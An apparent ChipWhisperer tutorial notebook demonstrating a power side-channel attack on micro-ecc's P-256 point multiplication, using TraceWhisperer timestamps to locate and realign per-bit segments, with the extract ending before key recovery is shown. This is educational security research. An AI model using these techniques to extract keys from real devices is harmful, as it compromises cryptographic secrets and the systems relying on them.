# Breaking Software ECC with TraceWhisperer

## Background
To get the most out of this tutorial, some basic knowledge of elliptic curves, and in particular of point multiplication on elliptic curves, is required. A good overview is available here: https://cryptojedi.org/peter/data/eccss-20130911b.pdf.

The side-channel attack presented here targets the scalar multiplier $k$ in the elliptic curve point multiplication. Point multiplication is the most expensive operation in most, if not all, cryptographic uses of elliptic curves. The secret scalar is not the private key, but learning the scalar used in an ECDSA signature (for example) allows the private key to be trivially calculated.
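
To see why a leaked scalar is so damaging, recall the ECDSA signing equation $s = k^{-1}(z + r d) \bmod n$, where $d$ is the private key, $z$ is the message hash and $(r, s)$ is the signature. Solving for $d$ gives $d = r^{-1}(s k - z) \bmod n$. The sketch below checks this with plain modular arithmetic. All values of `d`, `nonce_k`, `z` and `r` are made up for illustration (in a real signature, `r` is derived from the point $kG$), and the three-argument `pow` with a negative exponent assumes Python 3.8 or later.

```python
# Order of the NIST P-256 base point (a public curve parameter).
n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551

# Illustrative values only; none of these come from a real signature.
d = 0x1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef  # private key
nonce_k = 0xfedcba9876543210fedcba9876543210  # per-signature secret scalar
z = 0xdeadbeefdeadbeefdeadbeefdeadbeef        # message hash (made up)
r = 0xc0ffeec0ffeec0ffeec0ffeec0ffee          # stand-in for the x-coordinate of k*G

# ECDSA signing equation: s = k^-1 * (z + r*d) mod n
s = (pow(nonce_k, -1, n) * (z + r * d)) % n

# An attacker who learns k (plus the public r, s and z) can solve for d:
recovered_d = (pow(r, -1, n) * (s * nonce_k - z)) % n
assert recovered_d == d
```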

This attack is quite different from the AES side-channel attacks in our other tutorials. In most ECC point multiplication implementations (including the target used here), the secret scalar $k$ is processed one bit at a time. At a high level, the attack is very simple:
1. Identify when each bit of $k$ is processed on the power trace.
2. Find how processing a '1' is different from processing a '0'.
3. Assemble the secret $k$, one bit at a time.

The difficulty in attacking ECC is that there are a lot of different point multiplication algorithms, and so there isn't a single straightforward way to do the above steps.

Since we are attacking $k$ one bit at a time, its size has no impact on the difficulty of the attack. The curve used in this attack is the NIST P-256 curve; the same approach would work just as well with a larger curve. (In fact for some attacks, a larger curve can be beneficial, since it allows for more observations.)

Our attack requires multiple traces to be collected. The secret $k$ remains constant for each trace, but a different point must be used for each trace. However, we require no knowledge whatsoever of what the points actually are (which means that point blinding, a common countermeasure -- see [this paper](https://link.springer.com/chapter/10.1007/3-540-48059-5_25) for example -- would not be effective against this attack). Furthermore, if the attacker is limited to collecting a single trace for a given value of $k$, we will show in the end that we can correctly guess most of $k$.

The target for this attack is the popular [micro-ecc](https://github.com/kmackay/micro-ecc) library. We target directly the point multiplication implemented by its `uECC_point_mult` function, for the NIST P-256 (secp256r1) curve.

## TraceWhisperer

While this is an ECC tutorial, it also serves as a tutorial on using TraceWhisperer to help with side-channel analysis.

TraceWhisperer allows us to quickly zero-in on possible areas of interest in the power traces.

If you have a ChipWhisperer Husky, you're all set: TraceWhisperer functionality is built into it.

If you are using a ChipWhisperer-Lite or ChipWhisperer-Pro, you will also need our [TraceWhisperer](https://github.com/newaetech/DesignStartTrace/tree/master/hardware/tracewhisperer) tool (which is our [PhyWhisperer](https://github.com/newaetech/phywhispererusb) with a different FPGA bitfile). If you do not have a TraceWhisperer, you won't be able to run this tutorial in its present form, but you could try to build a TraceWhisperer-less version of this attack (let us know if you succeed!).

## Capture Notes

Most of the capture settings used below are similar to the standard ChipWhisperer scope settings. Some important points to note:

- The full ECC operation takes approximately 6 million clock cycles, so it is best done with a ChipWhisperer-Pro or Husky...
- ...but if you don't have a CW-Pro, and you have patience, it's also possible to run this with a ChipWhisperer-Lite. Every trace needs to be captured in several steps, using the sample offset feature (246 steps to be precise!), so trace acquisition is **much** slower: around 8 minutes/trace. The attack does not require a very large number of traces, but the initial profiling step will take over 13 hours. It's possible to skip this step by using the results provided in this tutorial. Then, the attack itself requires 20 traces, which is a more reasonable 2.5 hours (skip ahead to the "The Attack" section).
- To use a CW-lite, replace `capture_ecc_trace()` calls with `capture_ecc_trace_cwlite()`.
- It's possible that better results would be obtained with x4 sampling, but that would make trace acquisition with the CW-lite *very* slow!
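
The CW-Lite figures quoted above follow from simple arithmetic, sketched below. The sample counts are the ones used in this notebook's capture setup; the 8 minutes per trace is the approximate figure quoted above, so the resulting duration is only a rough estimate.

```python
import math

total_samples = 6_000_000      # approximate length of one ECC operation
samples_per_capture = 24_400   # CW-Lite capture size used in this notebook
minutes_per_trace = 8          # approximate CW-Lite acquisition time per trace

# Number of sample-offset steps needed to cover one full operation:
steps = math.ceil(total_samples / samples_per_capture)

# Time to collect the 100 traces used for the profiling step:
profiling_hours = 100 * minutes_per_trace / 60

print(steps)                      # 246
print(round(profiling_hours, 1))  # 13.3
```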


## Supported Targets

This tutorial is written for a CW-Pro with a CW308 and an STM32F3; it can also be run on the CW-lite (Arm version) without any modifications, save for the capture limitations noted above.

It should be possible to port this tutorial to other Arm targets without too much effort.

In [None]:
#TRACE_PLATFORM = 'CW610' # AKA PhyWhisperer
TRACE_PLATFORM = 'Husky'
PLATFORM = 'CW308_STM32F3'
TRACE_INTERFACE = 'swo'
SCOPETYPE = 'OPENADC'

# other supported options:
#PLATFORM = 'CWLITEARM'

# not supported by this notebook, but can be made to work:
#PLATFORM = 'CW308_K82F'
#TRACE_INTERFACE = 'parallel'
#TRACE_PLATFORM = 'CW305'

## Attack Details

Since there are many ways to implement point multiplication, the first step towards an attack is understanding the target implementation.

Luckily, the micro-ecc code is well-commented, and [line 749 of uECC.c](https://github.com/kmackay/micro-ecc/blob/24c60e243580c7868f4334a1ba3123481fe1aa48/uECC.c#L749) points us directly to what we need to know: the implementation follows algorithm 9 of https://eprint.iacr.org/2011/338.pdf. This saves us from reversing the algorithm from the C code (or worse, from the power trace itself: see [this paper](https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf) for a great example of a black-box reversing of ECC).

Our target firmware calls the `uECC_point_mult()` function, which has three inputs: the curve (not a secret), the base point on the curve (not a secret), and the secret scalar multiplier $k$.

$k$ is then *regularized* by the `regularize_k()` function, which essentially adds the curve order to $k$. It is this regularized $k$, which we'll denote $k_r$, that the main multiplication loop iterates on, and so this is what our attack will retrieve. The following functions allow you to go from the input $k$ to the regularized $k_r$ (and vice-versa):

In [None]:
from ecpy.curves import Curve, Point
curve = Curve.get_curve('NIST-P256')

def random_k(bits=256, tries=100):
    import random
    for i in range(tries):
        k = random.getrandbits(bits)
        if k < curve.order and k > 0:
            return k
    raise ValueError("Failed to generate a valid random k after %d tries!" % tries)

def regularized_k(input_k, bits=256):
    """Given input k, return the regularized k that the target processes (which the attack will retrieve).
    """
    assert input_k < curve.order
    kr = input_k + curve.order
    if kr & 2**bits:
        kr -= 2**bits
    return kr   

def input_k(kr, bits=256):
    """Given the regularized k that the target processes (which the attack will retrieve), return the corresponding input k.
    """
    if kr < curve.order:
        kr += 2**bits
    i_k = kr - curve.order
    assert i_k < curve.order # sanity check
    return i_k
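
As a quick sanity check, the two conversions should be exact inverses of each other. The sketch below re-implements them with the P-256 group order hard-coded, so that it runs without `ecpy`. The helper names `to_regularized` and `to_input` are hypothetical stand-ins for `regularized_k()` and `input_k()` above.

```python
import random

N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551  # P-256 order
BITS = 256

def to_regularized(k):
    """Mirror of regularized_k(): add the order, then drop bit 256 if set."""
    kr = k + N
    if kr & (1 << BITS):
        kr -= 1 << BITS
    return kr

def to_input(kr):
    """Mirror of input_k(): undo the truncation, then subtract the order."""
    if kr < N:
        kr += 1 << BITS
    return kr - N

demo_rng = random.Random(0)  # fixed seed so that the check is repeatable
for _ in range(1000):
    demo_k = demo_rng.randrange(1, N)
    assert to_input(to_regularized(demo_k)) == demo_k
```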


Next, the `EccPoint_mult()` function is called. There, we find the main loop which processes (most of) the bits of $k_r$, one bit at a time:
```C
for (i = num_bits - 2; i > 0; --i) {
    nb = !uECC_vli_testBit(scalar, i);
    XYcZ_addC(Rx[1 - nb], Ry[1 - nb], Rx[nb], Ry[nb], curve);
    XYcZ_add(Rx[nb], Ry[nb], Rx[1 - nb], Ry[1 - nb], curve);
}
```

The point multiplication algorithm used is a variant of the [Montgomery Ladder](https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication#Montgomery_ladder).

`nb` is the complement of the secret bit being processed, and as you can see, there is no branch that depends on `nb`: all that `nb` affects is which of `Rx[0], Ry[0], Rx[1], Ry[1]` is fed to the `XYcZ_addC()` and `XYcZ_add()` functions, which is where all the heavy lifting is done.

It's quite a clever algorithm, with inherent side-channel resistance for free! Clearly, micro-ecc will not be the easiest target to break -- this is not a toy example!
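
To make the structure concrete, here is a minimal Python sketch of a textbook Montgomery ladder. It is not micro-ecc's co-Z implementation: as a simplifying assumption, plain integers under addition stand in for curve points, so that the result is easy to check (it should equal `k * P`). What it does share with the C loop above is that every iteration performs one addition and one doubling, and that the secret bit only selects which register plays which role.

```python
def ladder_mult(k, P, num_bits):
    """Textbook Montgomery ladder over a toy additive group (integers)."""
    R = [0, P]  # invariant: R[1] - R[0] == P
    for i in range(num_bits - 1, -1, -1):
        bit = (k >> i) & 1
        # Same two operations for every bit; `bit` only picks the operands.
        R[1 - bit] = R[0] + R[1]   # stands in for point addition
        R[bit] = R[bit] + R[bit]   # stands in for point doubling
    return R[0]

assert ladder_mult(0b101101, 7, 6) == 0b101101 * 7
```

Note that this only illustrates the control flow: indexing a Python list with a secret bit is not a side-channel countermeasure in itself.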

One thing that could be interesting to do now is to run a TVLA test, to confirm that there is no apparent secret-dependent side-channel leakage from the *execution time* of this algorithm. Since this tutorial is already very long, this exercise is left to the reader.

Our attack will go as follows:
1. Use TraceWhisperer to identify when each call to `XYcZ_addC()` and `XYcZ_add()` is made.
2. Using a known $k_r$, look at the average power trace for each of these function calls when `nb=1` and when `nb=0`, to find some distinguishing markers.
3. With our distinguishers in hand, check that we can retrieve arbitrary $k$.

The high-level concept is simple, but there will be some tricky points along the way.

In [None]:
import chipwhisperer as cw

In [None]:
# platform setup:
if TRACE_PLATFORM == 'CW610':
    from chipwhisperer.capture.trace.TraceWhisperer import TraceWhisperer
    %run "../Setup_Scripts/Setup_Generic.ipynb"
    defines = ['../../software/chipwhisperer/capture/trace/defines/defines_trace.v', '../../software/chipwhisperer/capture/trace/defines/defines_pw.v']
    trace = TraceWhisperer(target, scope, force_bitfile=False, defines_files=defines)
    scope.clock.adc_src = "clkgen_x1"
    scope.gain.setGain(25)

elif TRACE_PLATFORM == 'Husky':
    %run "../Setup_Scripts/Setup_Generic.ipynb"
    scope.trace.target = target
    trace = scope.trace
    scope.clock.clkgen_freq = 10e6
    scope.clock.clkgen_src = 'system'
    scope.clock.adc_mul = 1
    scope.gain.setGain(19)
    target.baud = 38400 * 10 / 7.37

else:
    print('Refer to TraceWhisperer.ipynb for example of how to set up for CW305 target.')

In [None]:
trace.enabled = True
trace.clock.clkgen_enabled = True

In [None]:
if PLATFORM == 'CWLITEARM':
    scope.adc.samples = 24400
else: # for CW-pro / Husky:
    scope.adc.samples = 6000000
    scope.adc.stream_mode = True

### Program STM32 target:

**Warning**: if you make any changes to the target firmware (including compiler version and switches), there is a chance that the attack parameters used in this notebook won't work for you anymore. So, for your first run-through, stick with the provided binary.

But making changes to the target firmware is a great way to learn how to use TraceWhisperer, so once you've had success with the provided binary, do go ahead and try some changes! In fact, TraceWhisperer should make it easier to port the attack.

In [None]:
#%%bash -s "$PLATFORM"
#cd ../../hardware/victims/firmware/simpleserial-ecc
#make PLATFORM=$1 CRYPTO_TARGET=MICROECC

In [None]:
fw_path = '../../hardware/victims/firmware/simpleserial-ecc/simpleserial-ecc-{}.hex'.format(PLATFORM)

In [None]:
if (PLATFORM == 'CW308_STM32F3') or (PLATFORM == 'CWLITEARM'):
    prog = cw.programmers.STM32FProgrammer
    cw.program_target(scope, prog, fw_path)

In [None]:
reset_target(scope)

In [None]:
# target info and buildtimes:
print(trace.phywhisperer_name())
print(trace.get_fw_buildtime())
if TRACE_PLATFORM == 'Husky':
    print(scope.fpga_buildtime)
else:
    print(trace.fpga_buildtime)

### Set SWO operation mode:

Arm processors which support JTAG and SWD come out of reset in JTAG mode. In order to get trace data out of the SWO pin, we need to switch it over to SWD mode.

The `jtag_to_swd()` call below runs a special sequence on the TMS and TCK pins to do this switchover. However, different processors may have *additional* requirements to enable the SWO pin. The `simpleserial-trace` firmware handles this for our STM32 target.

Another sure-fire way to get a target into SWD mode is to use an external debugger. In that case, do not call `jtag_to_swd()`, as this could result in contention on the TMS/TCK pins, but do call `trace.set_trace_mode()`, because TraceWhisperer still needs to know that the target is in SWO mode.

The image and table below show the jumper cables that you need to connect between the PhyWhisperer and the target:

![jumpers](img/uecc_jumpers.png)

| PhyWhisperer | Target     |
|     :-:      |    :-:     |
|      D0      |    TMS     |
|      D1      |    TCK     |
|      D2      |    TDO     |
|      PC      | GPIO4/TRIG |
|      HS2     |   CLKIN    |
|     GND      |    GND     |

(Not shown in the picture is the HS2 - CLKIN connection, because earlier versions of TraceWhisperer did not support this.)

If you're using ChipWhisperer-Husky, then you only need the D0, D1 and D2 connections; the rest are provided by the 20-pin target cable.

In [None]:
if TRACE_INTERFACE == 'swo':
    assert TRACE_PLATFORM == 'CW610' or TRACE_PLATFORM == 'Husky', "Not supported :-("
    trace.clock.fe_clock_src = 'target_clock'
    assert trace.clock.fe_clock_alive, "Hmm, the clock you chose doesn't seem to be active."
    trace.trace_mode = 'SWO'
    trace.jtag_to_swd() # switch target from JTAG to SWD mode

    # Now the complicated bit:
    acpr = 0
    trigger_freq_mul = 8
    trace.clock.swo_clock_freq = scope.clock.clkgen_freq * trigger_freq_mul
    trace.target_registers.TPI_ACPR = acpr
    trace.swo_div = trigger_freq_mul * (acpr + 1)
    assert trace.clock.swo_clock_locked, "Trigger/UART clock not locked"
    assert scope.userio.status & 0x4, "SWO line not high"

else:
    print("Not supported in this notebook. See TraceWhisperer.ipynb to see how to set this up.")

In [None]:
import time
scope.clock.reset_adc()
time.sleep(0.2)
assert (scope.clock.adc_locked), "ADC failed to lock"

#### Check that the target is alive:
If `get_fw_buildtime()` produces no output, the target may have become unresponsive after the above changes; it may simply require a reset.

In [None]:
reset_target(scope)
print(trace.get_fw_buildtime())

### Trigger trace capture from target FW:

In [None]:
trace.capture.trigger_source = 'firmware trigger'

### Set a pattern matching rule and capture only rule match IDs:

TraceWhisperer can be set to collect raw trace data, or it can be set to simply record the times when the trace data matches a given pattern. For this use case, we'll use the latter because it's simpler, and it's sufficient for our needs.

Refer to the [TraceWhisperer tutorial notebook](https://github.com/newaetech/DesignStartTrace/blob/master/jupyter/TraceWhisperer.ipynb) to learn more about TraceWhisperer's capabilities.

In [None]:
trace.capture.raw = False

# match on any PC match (isync) trace packet:
trace.set_pattern_match(0, [3, 8, 32, 0, 0, 0, 0, 0], [255, 255, 255, 0, 0, 0, 0, 0])

# enable matching rule:
trace.capture.rules_enabled = [0]
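
Conceptually, a pattern-match rule compares each incoming window of trace bytes against a pattern, looking only at the bits selected by the mask. The sketch below illustrates that idea in plain Python, assuming a byte-wise compare where a mask byte of 0 means "don't care". The function `rule_matches` is hypothetical and is not part of the TraceWhisperer API, the example windows are made up, and the hardware matcher may differ in its details.

```python
def rule_matches(window, pattern, mask):
    """Return True if `window` equals `pattern` on every masked-in bit."""
    return all((w & m) == (p & m) for w, p, m in zip(window, pattern, mask))

demo_pattern = [3, 8, 32, 0, 0, 0, 0, 0]
demo_mask = [255, 255, 255, 0, 0, 0, 0, 0]

# Only the first three bytes are compared; the remaining five are ignored.
assert rule_matches([3, 8, 32, 0x96, 0x11, 0x00, 0x08, 0x00], demo_pattern, demo_mask)
assert not rule_matches([3, 8, 33, 0, 0, 0, 0, 0], demo_pattern, demo_mask)
```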

### How long to capture for:
Debug trace data will be collected as long as the target trigger output is high.

In [None]:
trace.capture.mode = 'while_trig'

### Customized functions to run and capture ECC power traces:

In [None]:
%run "ECC_capture.ipynb"

In [None]:
if TRACE_PLATFORM == 'CW610':
    print("*** Don't forget the jumper cable from CW308 GPIO4/TRIG pin to PhyWhisperer PC pin on side connector! ***")

By default the target is set to periodically emit trace synchronization frames. This is handy for verifying that the trace link is active, but it's detrimental to our attack: if a sync event occurs during the ECC operation, it could delay the trace events that we are using to help guide the attack. This disables the periodic sync frames:

In [None]:
trace.target_registers.DWT_CTRL = '40000021'

## First step of the attack: establish distinguishing markers

We start building the attack by using a known $k_r$ with an easy-to-recognize pattern so that we can look for what's different when `nb=0` versus `nb=1`.

This step, which only needs to be done once, is the longest part of the notebook: once this is done, carrying out the attack is much faster.

In [None]:
# big block of 1's, big block of 0's:
k = 0xf0000000fffffffefffffffffffffff04319055258e8617b0c46353d039cdaaf
kr = regularized_k(k)
hex(kr)

We then specify that we want to receive trace events when execution reaches addresses `0x08001196` and `0x080011bc`, which are the start of the `XYcZ_addC()` and `XYcZ_add()` functions, respectively.
(If you make any changes to the firmware, adjust these as necessary.)

You might think that we should spend more time analyzing the source code and assembly, to carefully pick potentially leaky instructions. But here's the thing:
1. We really don't know what the delay is between a target instruction being executed and the corresponding debug trace event being received.
2. As we'll soon see, the debug trace events can have significant amounts of jitter.

So we're using trace to find gross markers, not precise ones: we don't need to specify the exact addresses where we suspect/hope to find leakage. As long as we're in the vicinity, we should be ok.

In [None]:
trace.set_isync_matches(addr0=0x08001196, addr1=0x080011bc, match='both')

We then collect 100 traces. Each trace uses the same $k$, but a different base point. Using a different point allows us to "average out" the contribution of the base point to the power trace, to better focus on the effect of $k$.

In [None]:
import random
def new_point():
    tries = 100
    for i in range(tries):
        x = random.getrandbits(256)
        y = curve.y_recover(x)
        if y:
            return (x,y)
    raise ValueError('Failed to generate a random point')

In [None]:
traces = 100

from tqdm.notebook import tnrange

ptraces = []
raws = []

# acquire power and debug traces:
for t in tnrange(traces, desc='Capturing traces'):
    Px, Py = new_point()
    trace.arm_trace()
    ptrace = capture_ecc_trace(k, Px, Py)
    ptraces.append(ptrace)
    while trace.fifo_empty(): pass
    raws.append(trace.read_capture_data())

# convert debug traces into timestamps:
times = []
for i in range(len(raws)):
    times_both_markers = trace.get_rule_match_times(raws[i], rawtimes=False, verbose=False)
    assert len(times_both_markers) == 510
    times_p1 = times_both_markers[::2]
    times_p2 = times_both_markers[1::2]
    times.append([times_p1, times_p2])

The multi-dimensional `times` array carries the trace event timestamps; its dimensions are as follows:

`times [trace number] [address match index] [k index]`

Recall there are 100 traces, 2 address match indices, and 255 k indices. (Why 255 and not 256? Because the last bit of k is processed outside of the main loop. We'll see in the final attack that this doesn't matter.)
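
The de-interleaving above relies on the two address matches strictly alternating within each loop iteration. The sketch below shows the same slicing on synthetic data. The event format (a `[timestamp, rule]` pair) and the timestamp values are assumptions made for illustration, chosen so that the indexing reads like `times[T][M][kbit][0]` in the rest of the notebook.

```python
# Synthetic stand-in for one trace's rule-match events: 255 loop iterations,
# each producing one XYcZ_addC event followed by one XYcZ_add event.
demo_events = []
for kbit in range(255):
    demo_events.append([1000 * kbit, 0])        # first address match (made-up time)
    demo_events.append([1000 * kbit + 400, 0])  # second address match (made-up time)

assert len(demo_events) == 510
demo_p1 = demo_events[::2]    # events 0, 2, 4, ...: first address match
demo_p2 = demo_events[1::2]   # events 1, 3, 5, ...: second address match
demo_times = [[demo_p1, demo_p2]]  # a single trace: demo_times[T][M][kbit]

T, M, kbit = 0, 1, 10
print(demo_times[T][M][kbit][0])  # 10400
```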

In [None]:
# sanity check:
assert trace.errors is None

It's always worth checking whether the execution time of each loop iteration is leaking $k$. Let's compute the duration of the $i^{th}$ loop iteration, summed over all the traces (which is proportional to the average), and see whether we can find $k$ in there:

In [None]:
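deltas = []

prev = 0
for kbit in range(len(times[0][0])):
    # sum, over all traces, of the timestamp at which iteration kbit starts
    total = 0
    for T in range(len(ptraces)):
        ts = times[T][0][kbit][0]
        total += ts
    # difference between consecutive sums = summed duration of one iteration
    delta = total - prev
    prev = total
    deltas.append(delta)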

In [None]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.resources import INLINE
from bokeh.models import Span

output_notebook(INLINE)

deltaplot = figure(plot_width=1800)

xrange = range(len(deltas[1:]))

deltaplot.line(xrange, deltas[1:], line_color='green')

In [None]:
show(deltaplot)

Nope -- recall that $k_r$ is a long string of ones followed by a long string of zeros. Even with averaging over many traces, there doesn't seem to be any leakage there.

This shouldn't be surprising since we know the target is using the Montgomery Ladder algorithm.

If you want to be more formal, you could apply the TVLA test here -- this is left as an exercise to the reader.
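
For reference, the core of a TVLA-style check is Welch's t-test between two groups of measurements, with |t| > 4.5 commonly used as the threshold for flagging leakage. The sketch below is one way to set it up with NumPy. The two groups are synthetic placeholders, and how you partition real iteration durations (for example, iterations where the bit is one versus zero) is left to you.

```python
import numpy as np

def welch_t(a, b):
    """Welch's t-statistic between two 1-D sample groups."""
    a = np.asarray(a, dtype=float)
    b = np.asarray(b, dtype=float)
    var_a = a.var(ddof=1) / len(a)
    var_b = b.var(ddof=1) / len(b)
    return (a.mean() - b.mean()) / np.sqrt(var_a + var_b)

# Synthetic placeholder data: identical groups, then one shifted by a cycle.
group0 = np.tile([99.0, 100.0, 101.0], 50)
group1 = group0.copy()
assert abs(welch_t(group0, group1)) < 4.5        # no detectable difference
assert abs(welch_t(group0, group1 + 1.0)) > 4.5  # a 1-cycle shift is flagged
```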

### Compute the relationship between power and debug times:
Since power and debug times are captured from different clocks, we need to know their relationship, in order to combine the two data sources.

See [this page](https://github.com/newaetech/DesignStartTrace/tree/master/hardware/tracewhisperer/clocks.md) to understand how this is done.

In [None]:
if scope._is_husky:
    multiplier = scope.clock.adc_mul
elif scope.clock.adc_src == 'clkgen_x4' or scope.clock.adc_src == 'extclk_x4':
    multiplier = 4
else:
    multiplier = 1
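
With `multiplier` known, a trace-event timestamp converts to a power-sample index by a simple scaling. The helper below is a hypothetical convenience (it is not used elsewhere in this notebook) that captures the slicing pattern used repeatedly in the following cells. The synthetic `demo_wave` and the timestamp are made up, and only serve to make the indexing visible.

```python
import numpy as np

def power_segment(wave, timestamp, multiplier, length):
    """Slice `length` power samples beginning at a trace-event timestamp."""
    base = int(timestamp * multiplier)  # timestamp in target clocks -> ADC sample index
    return wave[base : base + length]

demo_wave = np.arange(10_000)  # synthetic "power trace": sample value == index
seg = power_segment(demo_wave, timestamp=1500, multiplier=4, length=5)
assert seg.tolist() == [6000, 6001, 6002, 6003, 6004]
```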

## Dealing with jitter

There is variance in the time between the occurrence of a trace event and the corresponding trace output, and this makes trace a little tricky to use for side-channel analysis.

We know that this jitter exists, and we can quantify it by looking at the corresponding power traces. If there were no jitter, the power traces from multiple runs, indexed from a trace event, would overlay nicely and show good alignment.

Instead, this is what we have:

In [None]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.resources import INLINE
from bokeh.models import Span

output_notebook(INLINE)

jitterplot = figure(plot_width=1800)

trace_index = 10
marker = 1
length = 500
offset = 0
start = 0

xrange = range(length)

indices = []
for i,color in zip([1,2,3,4,5,6,7], ['yellow', 'blue', 'red', 'orange', 'green', 'brown', 'black']):
    base = int(times[trace_index][marker][i][0]*multiplier)
    jitterplot.line(xrange, ptraces[trace_index].wave[base+offset+start : base+offset+start+length], line_color=color)


In [None]:
show(jitterplot)

To deal with this jitter, we pick one of the trace segments to be the reference trace. Then, for every other trace segment, we compute the sum of absolute differences for various offsets; the offset which yields the smallest difference is chosen.

We'll do this using two different trace start times: the time at which trace events were received, and the time 200 clock cycles before that. We do this because, as we will soon illustrate, traces can only be aligned for small periods of time; by trial and error it's been determined that these two start times provide useful trace segments.
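
Before running this on real traces, it may help to see the sum-of-absolute-differences (SAD) search in isolation. The sketch below applies it to synthetic data: a random signal stands in for a power trace, and a made-up delay of 37 samples stands in for the jitter. The function `best_offset` is a hypothetical helper, not part of the notebook.

```python
import numpy as np

def best_offset(ref, wave, base, search=range(-100, 100)):
    """Return the offset minimising the sum of absolute differences (SAD)."""
    sads = [np.sum(np.abs(ref - wave[base + o : base + o + len(ref)])) for o in search]
    return list(search)[int(np.argmin(sads))]

demo_rng = np.random.default_rng(0)   # synthetic data, fixed seed
clean = demo_rng.normal(size=3000)    # stand-in for a power trace
jitter = 37                           # made-up misalignment, in samples
delayed = np.concatenate([np.zeros(jitter), clean[:-jitter]])

ref = clean[1000:1300]                # reference segment
assert best_offset(ref, delayed, base=1000) == jitter
```

The real realignment code additionally rejects a match when the minimum SAD is not clearly below the average SAD, which guards against segments that do not resemble the reference at all.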


In [None]:
import numpy as np
basesegment = 0
offsets = np.zeros([2,len(ptraces),2,255], np.int32)

for A in range(2): # early/late realignment offset
    if A == 0:
        start = -200
        complength = 300
    else:
        start = 0
        complength = 1000
    for M in range(2): # address match index
        reftrace = np.asarray(ptraces[0].wave[int(times[0][M][basesegment][0]*multiplier) + start : int(times[0][M][basesegment][0]*multiplier) + complength + start])
        for T in tnrange(len(ptraces), desc='Realigning for A=%d, M=%d' % (A,M)):
            for kbit in range(255):
                if kbit == basesegment:
                    pass
                else:
                    diffs = []
                    for offset in range(-100,100):
                        comptrace = np.asarray(ptraces[T].wave[int(times[T][M][kbit][0]*multiplier) + offset + start : int(times[T][M][kbit][0]*multiplier) + complength + offset + start])
                        diffs.append(np.sum(abs(reftrace-comptrace)))
                    if min(diffs) < np.average(np.asarray(diffs))*.7:
                        offsets[A][T][M][kbit] = diffs.index(min(diffs)) - 100
                    else:
                        print('Failure for T=%d, kbit=%d (min=%f, avg=%f)' % (T, kbit, min(diffs), np.average(np.asarray(diffs))))


For clarity, the multi-dimensional `offsets` array has dimensions 2 x 100 x 2 x 255, defined as follows:

`offsets [early / late realignment] [trace number] [address match index] [k index]`

Since it's easy to get confused when working with these large multi-dimensional arrays, throughout the notebook we'll stick to a consistent naming scheme for the indexing variables:
- `A`: early/late realignment (0 or 1)
- `M`: address match index (0, for PC=0x08001196 match events, or 1, for PC=0x080011bc match events)
- `T`: trace number
- `kbit`: k index (0-254)

Let's look at the resulting aligned traces:

In [None]:
alignedplot = figure(plot_width=1800)

trace_index = 5
alignment = 1
marker = 1
length = 1400
offset = 0

if alignment == 0:
    start = -200
else:
    start = 0

xrange = range(length)

indices = []
for i in range(120,150):
    base = int(times[trace_index][marker][i][0]*multiplier)
    alignedplot.line(xrange, ptraces[trace_index].wave[base+offset+offsets[alignment][trace_index][marker][i]+start : base+offset+offsets[alignment][trace_index][marker][i]+length+start], line_color='blue')

    base = int(times[trace_index+1][marker][i][0]*multiplier)
    alignedplot.line(xrange, ptraces[trace_index+1].wave[base+offset+offsets[alignment][trace_index+1][marker][i]+start : base+offset+offsets[alignment][trace_index+1][marker][i]+length+start], line_color='red')

    base = int(times[trace_index+2][marker][i][0]*multiplier)
    alignedplot.line(xrange, ptraces[trace_index+2].wave[base+offset+offsets[alignment][trace_index+2][marker][i] + start : base+offset+offsets[alignment][trace_index+2][marker][i]+length+start], line_color='green')


In [None]:
show(alignedplot)

Here we see that traces are aligned from cycle 40 onwards until cycle 1270, where they diverge again. This is to be expected since we've already seen there is some variance in the execution time of our two target functions.

Finally, it's instructive to visualize the computed offsets (to deal with the debug trace jitter). First, let's look at the offset for the same power trace segment across all collected traces:

In [None]:
offset_all_traces = []
kbit = 1
A = 1
M = 0
for T in range(len(ptraces)):
    offset_all_traces.append(offsets[A][T][M][kbit])

offsetplot = figure(plot_width=1200, plot_height=300)
xrange = range(len(offset_all_traces))
offsetplot.line(xrange, offset_all_traces)

In [None]:
show(offsetplot)

We see that for the target operation, jitter oscillates between two values that are 71 clock cycles apart.

Now let's look at the offsets throughout the execution of a single trace:

In [None]:
offsets_one_trace = []
T = 1
A = 1
M = 1
for kbit in range(255):
    offsets_one_trace.append(offsets[A][T][M][kbit])

offsetplot = figure(plot_width=1200, plot_height=300)
xrange = range(len(offsets_one_trace))
offsetplot.line(xrange, offsets_one_trace)

In [None]:
show(offsetplot)

Again we see the 71 cycle jitter which oscillates back and forth.

Before we continue, we may need to shift our computed offsets. The reason for this will become clearer in a little bit, when we look at the differences between processing zeros vs ones.

For now, just know that depending on the sign of the offsets (which may be positive or negative), we make an adjustment to the offsets, which means that we shift the per-bit trace segments.

Note that this step isn't at all necessary for the attack to work: it just makes the tutorial easier to follow and makes things "just work" in a (hopefully!) fool-proof way.

In [None]:
signs = np.zeros([2,2], np.int8)
verbose = False
for A in range(2):
    for M in range(2):
        if verbose: print('A,M = %d, %d...' % (A, M))
        sign = ''
        for T in range(len(ptraces)):
            for kbit in range(1,255):
                oo = offsets[A][T][M][kbit]
                if abs(oo) > 40:
                    if oo > 0:
                        if not sign:
                            if verbose: print('POSITIVE: got %d for T %d, kbit %d' % (oo, T, kbit))
                            signs[A][M] = 1
                        elif sign == 'negative':
                            print('SIGN CHANGE!!! got %d for T %d, kbit %d' % (oo, T, kbit))
                        sign = 'positive'
                    else:
                        if not sign:
                            if verbose: print('NEGATIVE: got %d for T %d, kbit %d' % (oo, T, kbit))
                            signs[A][M] = -1
                        elif sign == 'positive':
                            print('SIGN CHANGE!!! got %d for T %d, kbit %d' % (oo, T, kbit))
                        sign = 'negative'

                    break

assert (signs[0][0] == 0) and (signs[0][1] == 0), 'Oops, never seen this before! Try repeating the trace capture and hope this error goes away.'

A = 1
for M in range(2):
    if signs[A][M] < 0:
        print('Adjusting offsets by +71 for A=%d, M=%d' % (A, M))
        for T in range(len(ptraces)):
            offsets[A][T][M] += 71

## Look at average ones and average zeros:
We have four different places to look at for differences between ones and zeros:
1. `XYcZ_addC()` function call, -200 clock cycle realignment
2. `XYcZ_addC()` function call, 0 clock cycle realignment
3. `XYcZ_add()` function call, -200 clock cycle realignment
